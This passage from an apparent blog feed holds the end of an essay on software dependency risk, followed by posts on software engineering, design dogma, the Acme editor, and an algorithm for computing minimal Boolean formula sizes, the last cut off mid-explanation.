that the main interpreter binary contained not just Sawzall’s JIT but also (unused) PostScript, Python, and JavaScript interpreters. Each time, the culprit turned out to be unused dependencies declared by some library Sawzall did depend on, combined with the fact that Google’s build system eliminated any manual effort needed to start using a new dependency.. This kind of error is the reason that the Go language makes importing an unused package a compile-time error. <p> Upgrading is a natural time to revisit the decision to use a dependency that’s changing. It’s also important to periodically revisit any dependency that <i>isn’t</i> changing. Does it seem plausible that there are no security problems or other bugs to fix? Has the project been abandoned? Maybe it’s time to start planning to replace that dependency. <p> It’s also important to recheck the security history of each dependency. For example, Apache Struts disclosed different major remote code execution vulnerabilities in 2016, 2017, and 2018. Even if you have a list of all the servers that run it and update them promptly, that track record might make you rethink using it at all. <a class=anchor href="#conclusion"><h2 id="conclusion">Conclusion</h2></a> <p> Software reuse is finally here, and I don’t mean to understate its benefits: it has brought an enormously positive transformation for software developers. Even so, we’ve accepted this transformation without completely thinking through the potential consequences. The old reasons for trusting dependencies are becoming less valid at exactly the same time we have more dependencies than ever. <p> The kind of critical examination of specific dependencies that I outlined in this article is a significant amount of work and remains the exception rather than the rule. But I doubt there are any developers who actually make the effort to do this for every possible new dependency. I have only done a subset of them for a subset of my own dependencies. Most of the time the entirety of the decision is “let’s see what happens.” Too often, anything more than that seems like too much effort. <p> But the Copay and Equifax attacks are clear warnings of real problems in the way we consume software dependencies today. We should not ignore the warnings. I offer three broad recommendations. <ol> <li> <p> <i>Recognize the problem.</i> If nothing else, I hope this article has convinced you that there is a problem here worth addressing. We need many people to focus significant effort on solving it. <li> <p> <i>Establish best practices for today.</i> We need to establish best practices for managing dependencies using what’s available today. This means working out processes that evaluate, reduce, and track risk, from the original adoption decision through to production use. In fact, just as some engineers specialize in testing, it may be that we need engineers who specialize in managing dependencies. <li> <p> <i>Develop better dependency technology for tomorrow.</i> Dependency managers have essentially eliminated the cost of downloading and installing a dependency. Future development effort should focus on reducing the cost of the kind of evaluation and maintenance necessary to use a dependency. For example, package discovery sites might work to find more ways to allow developers to share their findings. Build tools should, at the least, make it easy to run a package’s own tests. More aggressively, build tools and package management systems could also work together to allow package authors to test new changes against all public clients of their APIs. Languages should also provide easy ways to isolate a suspect package.</ol> <p> There’s a lot of good software out there. Let’s work together to find out how to reuse it safely. <p> <a class=anchor href="#references"><h2 id="references">References</h2></a> <ol> <li><a name=note1></a> Rachel Potvin and Josh Levenberg, “Why Google Stores Billions of Lines of Code in a Single Repository,” <i>Communications of the ACM</i> 59(7) (July 2016), pp. 78-87. <a href="https://doi.org/10.1145/2854146">https://doi.org/10.1145/2854146</a> <a class=back href="#body1">(⇡)</a> <li><a name=note2></a> Russ Cox, “Go &amp; Versioning,” February 2018. <a href="https://research.swtch.com/vgo">https://research.swtch.com/vgo</a> <a class=back href="#body2">(⇡)</a> <li><a name=note3></a> Ken Thompson, “Reflections on Trusting Trust,” <i>Communications of the ACM</i> 27(8) (August 1984), pp. 761–763. <a href="https://doi.org/10.1145/358198.358210">https://doi.org/10.1145/358198.358210</a> <a class=back href="#body3">(⇡)</a> <li><a name=note4></a> GNU Project, “GNU General Public License, version 1,” February 1989. <a href="https://www.gnu.org/licenses/old-licenses/gpl-1.0.html">https://www.gnu.org/licenses/old-licenses/gpl-1.0.html</a> <a class=back href="#body4">(⇡)</a> <li><a name=note5></a> Titus Winters, “SD-8: Standard Library Compatibility,” C++ Standing Document, August 2018. <a href="https://isocpp.org/std/standing-documents/sd-8-standard-library-compatibility">https://isocpp.org/std/standing-documents/sd-8-standard-library-compatibility</a> <a class=back href="#body5">(⇡)</a> <li><a name=note6></a> Go Project, “Go 1 and the Future of Go Programs,” September 2013. <a href="https://golang.org/doc/go1compat">https://golang.org/doc/go1compat</a> <a class=back href="#body6">(⇡)</a> <li><a name=note7></a> Facebook, “Infer: A tool to detect bugs in Java and C/C++/Objective-C code before it ships.” <a href="https://fbinfer.com/">https://fbinfer.com/</a> <a class=back href="#body7">(⇡)</a> <li><a name=note8></a> “SpotBugs: Find bugs in Java Programs.” <a href="https://spotbugs.github.io/">https://spotbugs.github.io/</a> <a class=back href="#body8">(⇡)</a> <li><a name=note9></a> D. Richard Hipp, “How SQLite is Tested.” <a href="https://www.sqlite.org/testing.html">https://www.sqlite.org/testing.html</a> <a class=back href="#body9">(⇡)</a> <li><a name=note10></a> Alexander Potapenko, “Testing Chromium: ThreadSanitizer v2, a next-gen data race detector,” April 2014. <a href="https://blog.chromium.org/2014/04/testing-chromium-threadsanitizer-v2.html">https://blog.chromium.org/2014/04/testing-chromium-threadsanitizer-v2.html</a> <a class=back href="#body10">(⇡)</a> <li><a name=note11></a> NIST, “National Vulnerability Database – Search and Statistics.” <a href="https://nvd.nist.gov/vuln/search">https://nvd.nist.gov/vuln/search</a> <a class=back href="#body11">(⇡)</a> <li><a name=note12></a> Russ Cox, “Regular Expression Matching with a Trigram Index, or How Google Code Search Worked,” January 2012. <a href="https://swtch.com/~rsc/regexp/regexp4.html">https://swtch.com/~rsc/regexp/regexp4.html</a> <a class=back href="#body12">(⇡)</a> <li><a name=note13></a> Google, “Google Open Source: Using Third-Party Licenses.” <a href="https://opensource.google.com/docs/thirdparty/licenses/#banned">https://opensource.google.com/docs/thirdparty/licenses/#banned</a> <a class=back href="#body13">(⇡)</a> <li><a name=note14></a> Nathan Willis, “A single Node of failure,” LWN, March 2016. <a href="https://lwn.net/Articles/681410/">https://lwn.net/Articles/681410/</a> <a class=back href="#body14">(⇡)</a> <li><a name=note15></a> Charlie Reis, “Multi-process Architecture,” September 2008. <a href="https://blog.chromium.org/2008/09/multi-process-architecture.html">https://blog.chromium.org/2008/09/multi-process-architecture.html</a> <a class=back href="#body15">(⇡)</a> <li><a name=note16></a> Adam Langley, “Chromium’s seccomp Sandbox,” August 2009. <a href="https://www.imperialviolet.org/2009/08/26/seccomp.html">https://www.imperialviolet.org/2009/08/26/seccomp.html</a> <a class=back href="#body16">(⇡)</a> <li><a name=note17></a> Nicolas Lacasse, “Open-sourcing gVisor, a sandboxed container runtime,” May 2018. <a href="https://cloud.google.com/blog/products/gcp/open-sourcing-gvisor-a-sandboxed-container-runtime">https://cloud.google.com/blog/products/gcp/open-sourcing-gvisor-a-sandboxed-container-runtime</a> <a class=back href="#body17">(⇡)</a> <li><a name=note18></a> Adam Baldwin, “Details about the event-stream incident,” November 2018. <a href="https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident">https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident</a> <a class=back href="#body18">(⇡)</a> <li><a name=note19></a> Russ Cox, “RE2: a principled approach to regular expression matching,” March 2010. <a href="https://opensource.googleblog.com/2010/03/re2-principled-approach-to-regular.html">https://opensource.googleblog.com/2010/03/re2-principled-approach-to-regular.html</a> <a class=back href="#body19">(⇡)</a> <li><a name=note20></a> Rob Pike, “Go Proverbs,” November 2015. <a href="https://go-proverbs.github.io/">https://go-proverbs.github.io/</a> <a class=back href="#body20">(⇡)</a> <li><a name=note21></a> U.S. House of Representatives Committee on Oversight and Government Reform, “The Equifax Data Breach,” Majority Staff Report, 115th Congress, December 2018. <a href="https://republicans-oversight.house.gov/wp-content/uploads/2018/12/Equifax-Report.pdf">https://republicans-oversight.house.gov/wp-content/uploads/2018/12/Equifax-Report.pdf</a> <a class=back href="#body21">(⇡)</a> <li><a name=note22></a> Russ Cox, “The Principles of Versioning in Go,” GopherCon Singapore, May 2018. <a href="https://www.youtube.com/watch?v=F8nrpe0XWRg">https://www.youtube.com/watch?v=F8nrpe0XWRg</a> <a class=back href="#body22">(⇡)</a> <li><a name=note23></a> Rob Pike, Sean Dorward, Robert Griesemer, and Sean Quinlan, “Interpreting the Data: Parallel Analysis with Sawzall,” <i>Scientific Programming Journal</i>, vol. 13 (2005). <a href="https://doi.org/10.1155/2005/962135">https://doi.org/10.1155/2005/962135</a> <a class=back href="#body23">(⇡)</a> </ol> <a class=anchor href="#coda"><h2 id="coda">Coda</h2></a> <p> A version of this post was published in <a href="https://queue.acm.org/detail.cfm?id=3344149">ACM Queue</a> (March-April 2019) and then <a href="https://dl.acm.org/doi/pdf/10.1145/3347446">Communications of the ACM</a> (August 2019) under the title “Surviving Software Dependencies.” What is Software Engineering? tag:research.swtch.com,2012:research.swtch.com/vgo-eng 2018-05-30T10:00:00-04:00 2018-05-30T10:02:00-04:00 What is software engineering and what does Go mean by it? (Go & Versioning, Part 9) <p> Nearly all of Go’s distinctive design decisions were aimed at making software engineering simpler and easier. We’ve said this often. The canonical reference is Rob Pike’s 2012 article, “<a href="https://talks.golang.org/2012/splash.article">Go at Google: Language Design in the Service of Software Engineering</a>.” But what is software engineering?<blockquote> <p> <i>Software engineering is what happens to programming <br> when you add time and other programmers.</i></blockquote> <p> Programming means getting a program working. You have a problem to solve, you write some Go code, you run it, you get your answer, you’re done. That’s programming, and that’s difficult enough by itself. But what if that code has to keep working, day after day? What if five other programmers need to work on the code too? Then you start to think about version control systems, to track how the code changes over time and to coordinate with the other programmers. You add unit tests, to make sure bugs you fix are not reintroduced over time, not by you six months from now, and not by that new team member who’s unfamiliar with the code. You think about modularity and design patterns, to divide the program into parts that team members can work on mostly independently. You use tools to help you find bugs earlier. You look for ways to make programs as clear as possible, so that bugs are less likely. You make sure that small changes can be tested quickly, even in large programs. You’re doing all of this because your programming has turned into software engineering. <p> (This definition and explanation of software engineering is my riff on an original theme by my Google colleague Titus Winters, whose preferred phrasing is “software engineering is programming integrated over time.” It’s worth seven minutes of your time to see <a href="https://www.youtube.com/watch?v=tISy7EJQPzI&t=8m17s">his presentation of this idea at CppCon 2017</a>, from 8:17 to 15:00 in the video.) <p> As I said earlier, nearly all of Go’s distinctive design decisions have been motivated by concerns about software engineering, by trying to accommodate time and other programmers into the daily practice of programming. <p> For example, most people think that we format Go code with <code>gofmt</code> to make code look nicer or to end debates among team members about program layout. But the <a href="https://groups.google.com/forum/#!msg/golang-nuts/HC2sDhrZW5Y/7iuKxdbLExkJ">most important reason for <code>gofmt</code></a> is that if an algorithm defines how Go source code is formatted, then programs, like <code>goimports</code> or <code>gorename</code> or <code>go</code> <code>fix</code>, can edit the source code more easily, without introducing spurious formatting changes when writing the code back. This helps you maintain code over time. <p> As another example, Go import paths are URLs. If code said <code>import</code> <code>"uuid"</code>, you’d have to ask which <code>uuid</code> package. Searching for <code>uuid</code> on <a href="https://godoc.org">godoc.org</a> turns up dozens of packages. If instead the code says <code>import</code> <code>"github.com/pborman/uuid"</code>, now it’s clear which package we mean. Using URLs avoids ambiguity and also reuses an existing mechanism for giving out names, making it simpler and easier to coordinate with other programmers. <p> Continuing the example, Go import paths are written in Go source files, not in a separate build configuration file. This makes Go source files self-contained, which makes it easier to understand, modify, and copy them. These decisions, and more, were all made with the goal of simplifying software engineering. <p> In later posts I will talk specifically about why versions are important for software engineering and how software engineering concerns motivate the design changes from dep to vgo. Go and Dogma tag:research.swtch.com,2012:research.swtch.com/dogma 2017-01-09T09:00:00-05:00 2017-01-09T09:02:00-05:00 Programming language dogmatics. <p> [<i>Cross-posting from last year’s <a href="https://www.reddit.com/r/golang/comments/46bd5h/ama_we_are_the_go_contributors_ask_us_anything/d05yyde/?context=3&st=ixq5hjko&sh=7affd469">Go contributors AMA</a> on Reddit, because it’s still important to remember.</i>] <p> One of the perks of working on Go these past years has been the chance to have many great discussions with other language designers and implementers, for example about how well various design decisions worked out or the common problems of implementing what look like very different languages (for example both Go and Haskell need some kind of “green threads”, so there are more shared runtime challenges than you might expect). In one such conversation, when I was talking to a group of early Lisp hackers, one of them pointed out that these discussions are basically never dogmatic. Designers and implementers remember working through the good arguments on both sides of a particular decision, and they’re often eager to hear about someone else’s experience with what happens when you make that decision differently. Contrast that kind of discussion with the heated arguments or overly zealous statements you sometimes see from users of the same languages. There’s a real disconnect, possibly because the users don’t have the experience of weighing the arguments on both sides and don’t realize how easily a particular decision might have gone the other way. <p> Language design and implementation is engineering. We make decisions using evaluations of costs and benefits or, if we must, using predictions of those based on past experience. I think we have an important responsibility to explain both sides of a particular decision, to make clear that the arguments for an alternate decision are actually good ones that we weighed and balanced, and to avoid the suggestion that particular design decisions approach dogma. I hope <a href="https://www.reddit.com/r/golang/comments/46bd5h/ama_we_are_the_go_contributors_ask_us_anything/d05yyde/?context=3&st=ixq5hjko&sh=7affd469">the Reddit AMA</a> as well as discussion on <a href="https://groups.google.com/group/golang-nuts">golang-nuts</a> or <a href="http://stackoverflow.com/questions/tagged/go">StackOverflow</a> or the <a href="https://forum.golangbridge.org/">Go Forum</a> or at <a href="https://golang.org/wiki/Conferences">conferences</a> help with that. <p> But we need help from everyone. Remember that none of the decisions in Go are infallible; they’re just our best attempts at the time we made them, not wisdom received on stone tablets. If someone asks why Go does X instead of Y, please try to present the engineering reasons fairly, including for Y, and avoid argument solely by appeal to authority. It’s too easy to fall into the “well that’s just not how it’s done here” trap. And now that I know about and watch for that trap, I see it in nearly every technical community, although some more than others. A Tour of Acme tag:research.swtch.com,2012:research.swtch.com/acme 2012-09-17T11:00:00-04:00 2012-09-17T11:00:00-04:00 A video introduction to Acme, the Plan 9 text editor <p class="lp"> People I work with recognize my computer easily: it's the one with nothing but yellow windows and blue bars on the screen. That's the text editor acme, written by Rob Pike for Plan 9 in the early 1990s. Acme focuses entirely on the idea of text as user interface. It's difficult to explain acme without seeing it, though, so I've put together a screencast explaining the basics of acme and showing a brief programming session. Remember as you watch the video that the 854x480 screen is quite cramped. Usually you'd run acme on a larger screen: even my MacBook Air has almost four times as much screen real estate. </p> <center> <div style="border: 1px solid black; width: 853px; height: 480px;"><iframe width="853" height="480" src="https://www.youtube.com/embed/dP1xVpMPn8M?rel=0" frameborder="0" allowfullscreen></iframe></div> </center> <p class=pp> The video doesn't show everything acme can do, nor does it show all the ways you can use it. Even small idioms like where you type text to be loaded or executed vary from user to user. To learn more about acme, read Rob Pike's paper &ldquo;<a href="/acme.pdf">Acme: A User Interface for Programmers</a>&rdquo; and then try it. </p> <p class=pp> Acme runs on most operating systems. If you use <a href="https://9p.io/">Plan 9 from Bell Labs</a>, you already have it. If you use FreeBSD, Linux, OS X, or most other Unix clones, you can get it as part of <a href="http://swtch.com/plan9port/">Plan 9 from User Space</a>. If you use Windows, I suggest trying acme as packaged in <a href="http://code.google.com/p/acme-sac/">acme stand alone complex</a>, which is based on the Inferno programming environment. </p> <p class=lp><b>Mini-FAQ</b>: <ul> <li><i>Q. Can I use scalable fonts?</i> A. On the Mac, yes. If you run <code>acme -f /mnt/font/Monaco/16a/font</code> you get 16-point anti-aliased Monaco as your font, served via <a href="http://swtch.com/plan9port/man/man4/fontsrv.html">fontsrv</a>. If you'd like to add X11 support to fontsrv, I'd be happy to apply the patch. <li><i>Q. Do I need X11 to build on the Mac?</i> A. No. The build will complain that it cannot build &lsquo;snarfer&rsquo; but it should complete otherwise. You probably don't need snarfer. </ul> <p class=pp> If you're interested in history, the predecessor to acme was called help. Rob Pike's paper &ldquo;<a href="/help.pdf">A Minimalist Global User Interface</a>&rdquo; describes it. See also &ldquo;<a href="/sam.pdf">The Text Editor sam</a>&rdquo; </p> <p class=pp> <i>Correction</i>: the smiley program in the video was written by Ken Thompson. I got it from Dennis Ritchie, the more meticulous archivist of the pair. </p> Minimal Boolean Formulas tag:research.swtch.com,2012:research.swtch.com/boolean 2011-05-18T00:00:00-04:00 2011-05-18T00:00:00-04:00 Simplify equations with God <p><style type="text/css"> p { line-height: 150%; } blockquote { text-align: left; } pre.alg { font-family: sans-serif; font-size: 100%; margin-left: 60px; } td, th { padding-left; 5px; padding-right: 5px; vertical-align: top; } #times td { text-align: right; } table { padding-top: 1em; padding-bottom: 1em; } #find td { text-align: center; } </style> <p class=lp> <a href="http://oeis.org/A056287">28</a>. That's the minimum number of AND or OR operators you need in order to write any Boolean function of five variables. <a href="http://alexhealy.net/">Alex Healy</a> and I computed that in April 2010. Until then, I believe no one had ever known that little fact. This post describes how we computed it and how we almost got scooped by <a href="http://research.swtch.com/2011/01/knuth-volume-4a.html">Knuth's Volume 4A</a> which considers the problem for AND, OR, and XOR. </p> <h3>A Naive Brute Force Approach</h3> <p class=pp> Any Boolean function of two variables can be written with at most 3 AND or OR operators: the parity function on two variables X XOR Y is (X AND Y') OR (X' AND Y), where X' denotes &ldquo;not X.&rdquo; We can shorten the notation by writing AND and OR like multiplication and addition: X XOR Y = X*Y' + X'*Y. </p> <p class=pp> For three variables, parity is also a hardest function, requiring 9 operators: X XOR Y XOR Z = (X*Z'+X'*Z+Y')*(X*Z+X'*Z'+Y). </p> <p class=pp> For four variables, parity is still a hardest function, requiring 15 operators: W XOR X XOR Y XOR Z = (X*Z'+X'*Z+W'*Y+W*Y')*(X*Z+X'*Z'+W*Y+W'*Y'). </p> <p class=pp> The sequence so far prompts a few questions. Is parity always a hardest function? Does the minimum number of operators alternate between 2<sup>n</sup>&#8722;1 and 2<sup>n</sup>+1? </p> <p class=pp> I computed these results in January 2001 after hearing the problem from Neil Sloane, who suggested it as a variant of a similar problem first studied by Claude Shannon. </p> <p class=pp> The program I wrote to compute a(4) computes the minimum number of operators for every Boolean function of n variables in order to find the largest minimum over all functions. There are 2<sup>4</sup> = 16 settings of four variables, and each function can pick its own value for each setting, so there are 2<sup>16</sup> different functions. To make matters worse, you build new functions by taking pairs of old functions and joining them with AND or OR. 2<sup>16</sup> different functions means 2<sup>16</sup>&#183;2<sup>16</sup> = 2<sup>32</sup> pairs of functions. </p> <p class=pp> The program I wrote was a mangling of the Floyd-Warshall all-pairs shortest paths algorithm. That algorithm is: </p> <pre class="indent alg"> // Floyd-Warshall all pairs shortest path func compute(): for each node i for each node j dist[i][j] = direct distance, or &#8734; for each node k for each node i for each node j d = dist[i][k] + dist[k][j] if d &lt; dist[i][j] dist[i][j] = d return </pre> <p class=lp> The algorithm begins with the distance table dist[i][j] set to an actual distance if i is connected to j and infinity otherwise. Then each round updates the table to account for paths going through the node k: if it's shorter to go from i to k to j, it saves that shorter distance in the table. The nodes are numbered from 0 to n, so the variables i, j, k are simply integers. Because there are only n nodes, we know we'll be done after the outer loop finishes. </p> <p class=pp> The program I wrote to find minimum Boolean formula sizes is an adaptation, substituting formula sizes for distance. </p> <pre class="indent alg"> // Algorithm 1 func compute() for each function f size[f] = &#8734; for each single variable function f = v size[f] = 0 loop changed = false for each function f for each function g d = size[f] + 1 + size[g] if d &lt; size[f OR g] size[f OR g] = d changed = true if d &lt; size[f AND g] size[f AND g] = d changed = true if not changed return </pre> <p class=lp> Algorithm 1 runs the same kind of iterative update loop as the Floyd-Warshall algorithm, but it isn't as obvious when you can stop, because you don't know the maximum formula size beforehand. So it runs until a round doesn't find any new functions to make, iterating until it finds a fixed point. </p> <p class=pp> The pseudocode above glosses over some details, such as the fact that the per-function loops can iterate over a queue of functions known to have finite size, so that each loop omits the functions that aren't yet known. That's only a constant factor improvement, but it's a useful one. </p> <p class=pp> Another important detail missing above is the representation of functions. The most convenient representation is a binary truth table. For example, if we are computing the complexity of two-variable functions, there are four possible inputs, which we can number as follows. </p> <center> <table> <tr><th>X <th>Y <th>Value <tr><td>false <td>false <td>00<sub>2</sub> = 0 <tr><td>false <td>true <td>01<sub>2</sub> = 1 <tr><td>true <td>false <td>10<sub>2</sub> = 2 <tr><td>true <td>true <td>11<sub>2</sub> = 3 </table> </center> <p class=pp> The functions are then the 4-bit numbers giving the value of the function for each input. For example, function 13 = 1101<sub>2</sub> is true for all inputs except X=false Y=true. Three-variable functions correspond to 3-bit inputs generating 8-bit truth tables, and so on. </p> <p class=pp> This representation has two key advantages. The first is that the numbering is dense, so that you can implement a map keyed by function using a simple array. The second is that the operations &ldquo;f AND g&rdquo; and &ldquo;f OR g&rdquo; can be implemented using bitwise operators: the truth table for &ldquo;f AND g&rdquo; is the bitwise AND of the truth tables for f and g. </p> <p class=pp> That program worked well enough in 2001 to compute the minimum number of operators necessary to write any 1-, 2-, 3-, and 4-variable Boolean function. Each round takes asymptotically O(2<sup>2<sup>n</sup></sup>&#183;2<sup>2<sup>n</sup></sup>) = O(2<sup>2<sup>n+1</sup></sup>) time, and the number of rounds needed is O(the final answer). The answer for n=4 is 15, so the computation required on the order of 15&#183;2<sup>2<sup>5</sup></sup> = 15&#183;2<sup>32</sup> iterations of the innermost loop. That was plausible on the computer I was using at the time, but the answer for n=5, likely around 30, would need 30&#183;2<sup>64</sup> iterations to compute, which seemed well out of reach. At the time, it seemed plausible that parity was always a hardest function and that the minimum size would continue to alternate between 2<sup>n</sup>&#8722;1 and 2<sup>n</sup>+1. It's a nice pattern. </p> <h3>Exploiting Symmetry</h3> <p class=pp> Five years later, though, Alex Healy and I got to talking about this sequence, and Alex shot down both conjectures using results from the theory of circuit complexity. (Theorists!) Neil Sloane added this note to the <a href="http://oeis.org/history?seq=A056287">entry for the sequence</a> in his Online Encyclopedia of Integer Sequences: </p> <blockquote> <tt> %E A056287 Russ Cox conjectures that X<sub>1</sub> XOR ... XOR X<sub>n</sub> is always a worst f and that a(5) = 33 and a(6) = 63. But (Jan 27 2006) Alex Healy points out that this conjecture is definitely false for large n. So what is a(5)? </tt> </blockquote> <p class=lp> Indeed. What is a(5)? No one knew, and it wasn't obvious how to find out. </p> <p class=pp> In January 2010, Alex and I started looking into ways to speed up the computation for a(5). 30&#183;2<sup>64</sup> is too many iterations but maybe we could find ways to cut that number. </p> <p class=pp> In general, if we can identify a class of functions f whose members are guaranteed to have the same complexity, then we can save just one representative of the class as long as we recreate the entire class in the loop body. What used to be: </p> <pre class="indent alg"> for each function f for each function g visit f AND g visit f OR g </pre> <p class=lp> can be rewritten as </p> <pre class="indent alg"> for each canonical function f for each canonical function g for each ff equivalent to f for each gg equivalent to g visit ff AND gg visit ff OR gg </pre> <p class=lp> That doesn't look like an improvement: it's doing all the same work. But it can open the door to new optimizations depending on the equivalences chosen. For example, the functions &ldquo;f&rdquo; and &ldquo;&#172;f&rdquo; are guaranteed to have the same complexity, by <a href="http://en.wikipedia.org/wiki/De_Morgan's_laws">DeMorgan's laws</a>. If we keep just one of those two on the lists that &ldquo;for each function&rdquo; iterates over, we can unroll the inner two loops, producing: </p> <pre class="indent alg"> for each canonical function f for each canonical function g visit f OR g visit f AND g visit &#172;f OR g visit &#172;f AND g visit f OR &#172;g visit f AND &#172;g visit &#172;f OR &#172;g visit &#172;f AND &#172;g </pre> <p class=lp> That's still not an improvement, but it's no worse. Each of the two loops considers half as many functions but the inner iteration is four times longer. Now we can notice that half of tests aren't worth doing: &ldquo;f AND g&rdquo; is the negation of &ldquo;&#172;f OR &#172;g,&rdquo; and so on, so only half of them are necessary. </p> <p class=pp> Let's suppose that when choosing between &ldquo;f&rdquo; and &ldquo;&#172;f&rdquo; we keep the one that is false when presented with all true inputs. (This has the nice property that <code>f ^ (int32(f) &gt;&gt; 31)</code> is the truth table for the canonical form of <code>f</code>.) Then we can tell which combinations above will produce canonical functions when f and g are already canonical: </p> <pre class="indent alg"> for each canonical function f for each canonical function g visit f OR g visit f AND g visit &#172;f AND g visit f AND &#172;g </pre> <p class=lp> That's a factor of two improvement over the original loop. </p> <p class=pp> Another observation is that permuting the inputs to a function doesn't change its complexity: &ldquo;f(V, W, X, Y, Z)&rdquo; and &ldquo;f(Z, Y, X, W, V)&rdquo; will have the same minimum size. For complex functions, each of the 5! = 120 permutations will produce a different truth table. A factor of 120 reduction in storage is good but again we have the problem of expanding the class in the iteration. This time, there's a different trick for reducing the work in the innermost iteration. Since we only need to produce one member of the equivalence class, it doesn't make sense to permute the inputs to both f and g. Instead, permuting just the inputs to f while fixing g is guaranteed to hit at least one member of each class that permuting both f and g would. So we gain the factor of 120 twice in the loops and lose it once in the iteration, for a net savings of 120. (In some ways, this is the same trick we did with &ldquo;f&rdquo; vs &ldquo;&#172;f.&rdquo;) </p> <p class=pp> A final observation is that negating any of the inputs to the function doesn't change its complexity, because X and X' have the same complexity. The same argument we used for permutations applies here, for another constant factor of 2<sup>5</sup> = 32. </p> <p class=pp> The code stores a single function for each equivalence class and then recomputes the equivalent functions for f, but not g. </p> <pre class="indent alg"> for each canonical function f for each function ff equivalent to f for each canonical function g visit ff OR g visit ff AND g visit &#172;ff AND g visit ff AND &#172;g </pre> <p class=lp> In all, we just got a savings of 2&#183;120&#183;32 = 7680, cutting the total number of iterations from 30&#183;2<sup>64</sup> = 5&#215;10<sup>20</sup> to 7&#215;10<sup>16</sup>. If you figure we can do around 10<sup>9</sup> iterations per second, that's still 800 days of CPU time. </p> <p class=pp> The full algorithm at this point is: </p> <pre class="indent alg"> // Algorithm 2 func compute(): for each function f size[f] = &#8734; for each single variable function f = v size[f] = 0 loop changed = false for each canonical function f for each function ff equivalent to f for each canonical function g d = size[ff] + 1 + size[g] changed |= visit(d, ff OR g) changed |= visit(d, ff AND g) changed |= visit(d, ff AND &#172;g) changed |= visit(d, &#172;ff AND g) if not changed return func visit(d, fg): if size[fg] != &#8734; return false record fg as canonical for each function ffgg equivalent to fg size[ffgg] = d return true </pre> <p class=lp> The helper function &ldquo;visit&rdquo; must set the size not only of its argument fg but also all equivalent functions under permutation or inversion of the inputs, so that future tests will see that they have been computed. </p> <h3>Methodical Exploration</h3> <p class=pp> There's one final improvement we can make. The approach of looping until things stop changing considers each function pair multiple times as their sizes go down. Instead, we can consider functions in order of complexity, so that the main loop builds first all the functions of minimum complexity 1, then all the functions of minimum complexity 2, and so on. If we do that, we'll consider each function pair at most once. We can stop when all functions are accounted for. </p> <p class=pp> Applying this idea to Algorithm 1 (before canonicalization) yields: </p> <pre class="indent alg"> // Algorithm 3 func compute() for each function f size[f] = &#8734; for each single variable function f = v size[f] = 0 for k = 1 to &#8734; for each function f for each function g of size k &#8722; size(f) &#8722; 1 if size[f AND g] == &#8734; size[f AND g] = k nsize++ if size[f OR g] == &#8734; size[f OR g] = k nsize++ if nsize == 2<sup>2<sup>n</sup></sup> return </pre> <p class=lp> Applying the idea to Algorithm 2 (after canonicalization) yields: </p> <pre class="indent alg"> // Algorithm 4 func compute(): for each function f size[f] = &#8734; for each single variable function f = v size[f] = 0 for k = 1 to &#8734; for each canonical function f for each function ff equivalent to f for each canonical function g of size k &#8722; size(f) &#8722; 1 visit(k, ff OR g) visit(k, ff AND g) visit(k, ff AND &#172;g) visit(k, &#172;ff AND g) if nvisited == 2<sup>2<sup>n</sup></sup> return func visit(d, fg): if size[fg] != &#8734; return record fg as canonical for each function ffgg equivalent to fg if size[ffgg] != &#8734; size[ffgg] = d nvisited += 2 // counts ffgg and &#172;ffgg return </pre> <p class=lp> The original loop in Algorithms 1 and 2 considered each pair f, g in every iteration of the loop after they were computed. The new loop in Algorithms 3 and 4 considers each pair f, g only once, when k = size(f) + size(g) + 1. This removes the leading factor of 30 (the number of times we expected the first loop to run) from our estimation of the run time. Now the expected number of iterations is around 2<sup>64</sup>/7680 = 2.4&#215;10<sup>15</sup>. If we can do 10<sup>9</sup> iterations per second, that's only 28 days of CPU time, which I can deliver if you can wait a month. </p> <p class=pp> Our estimate does not include the fact that not all function pairs need to be considered. For example, if the maximum size is 30, then the functions of size 14 need never be paired against the functions of size 16, because any result would have size 14+1+16 = 31. So even 2.4&#215;10<sup>15</sup> is an overestimate, but it's in the right ballpark. (With hindsight I can report that only 1.7&#215;10<sup>14</sup> pairs need to be considered but also that our estimate of 10<sup>9</sup> iterations per second was optimistic. The actual calculation ran for 20 days, an average of about 10<sup>8</sup> iterations per second.) </p> <h3>Endgame: Directed Search</h3> <p class=pp> A month is still a long time to wait, and we can do better. Near the end (after k is bigger than, say, 22), we are exploring the fairly large space of function pairs in hopes of finding a fairly small number of remaining functions. At that point it makes sense to change from the bottom-up &ldquo;bang things together and see what we make&rdquo; to the top-down &ldquo;try to make this one of these specific functions.&rdquo; That is, the core of the current search is: </p> <pre class="indent alg"> for each canonical function f for each function ff equivalent to f for each canonical function g of size k &#8722; size(f) &#8722; 1 visit(k, ff OR g) visit(k, ff AND g) visit(k, ff AND &#172;g) visit(k, &#172;ff AND g) </pre> <p class=lp> We can change it to: </p> <pre class="indent alg"> for each missing function fg for each canonical function g for all possible f such that one of these holds * fg = f OR g * fg = f AND g * fg = &#172;f AND g * fg = f AND &#172;g if size[f] == k &#8722; size(g) &#8722; 1 visit(k, fg) next fg </pre> <p class=lp> By the time we're at the end, exploring all the possible f to make the missing functions&#8212;a directed search&#8212;is much less work than the brute force of exploring all combinations. </p> <p class=pp> As an example, suppose we are looking for f such that fg = f OR g. The equation is only possible to satisfy if fg OR g == fg. That is, if g has any extraneous 1 bits, no f will work, so we can move on. Otherwise, the remaining condition is that f AND &#172;g == fg AND &#172;g. That is, for the bit positions where g is 0, f must match fg. The other bits of f (the bits where g has 1s) can take any value. We can enumerate the possible f values by recursively trying all possible values for the &ldquo;don't care&rdquo; bits. </p> <pre class="indent alg"> func find(x, any, xsize): if size(x) == xsize return x while any != 0 bit = any AND &#8722;any // rightmost 1 bit in any any = any AND &#172;bit if f = find(x OR bit, any, xsize) succeeds return f return failure </pre> <p class=lp> It doesn't matter which 1 bit we choose for the recursion, but finding the rightmost 1 bit is cheap: it is isolated by the (admittedly surprising) expression &ldquo;any AND &#8722;any.&rdquo; </p> <p class=pp> Given <code>find</code>, the loop above can try these four cases: </p> <center> <table id=find> <tr><th>Formula <th>Condition <th>Base x <th>&ldquo;Any&rdquo; bits <tr><td>fg = f OR g <td>fg OR g == fg <td>fg AND &#172;g <td>g <tr><td>fg = f OR &#172;g <td>fg OR &#172;g == fg <td>fg AND g <td>&#172;g <tr><td>&#172;fg = f OR g <td>&#172;fg OR g == fg <td>&#172;fg AND &#172;g <td>g <tr><td>&#172;fg = f OR &#172;g <td>&#172;fg OR &#172;g == &#172;fg <td>&#172;fg AND g <td>&#172;g </table> </center> <p class=lp> Rewriting the Boolean expressions to use only the four OR forms means that we only need to 